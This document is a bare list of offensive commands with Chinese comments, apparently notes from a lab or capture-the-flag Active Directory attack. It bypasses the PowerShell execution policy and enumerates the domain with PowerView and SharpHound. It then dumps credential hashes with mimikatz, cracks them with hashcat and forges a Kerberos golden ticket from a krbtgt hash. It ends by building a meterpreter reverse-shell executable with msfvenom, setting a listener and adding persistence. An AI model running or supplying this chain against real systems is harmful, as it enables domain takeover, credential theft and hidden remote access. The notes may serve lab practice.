powershell -ep bypass
. .\PowerView.ps1
Get-NetUser | select cn #枚举域用户
Get-NetGroup -GroupName *admin*#枚举域组
Invoke-sharefinder #共享文件夹
Get-NetComputer -fulldata #系统
Get-NetUser
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip
.\mimikatz.exe
privilege::debug
lsadump::lsa /patch
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

lsadump::lsa /inject /name:krbtgt 
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 #黄金票据

Event Viewer 查看事件日志

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe -o shell.exe
use exploit/multi/handler#创建监听器
set payload windows/meterpreter/reverse_tcp
set LHOST
run

#持久性
use exploit/windows/local/persistence
set session 1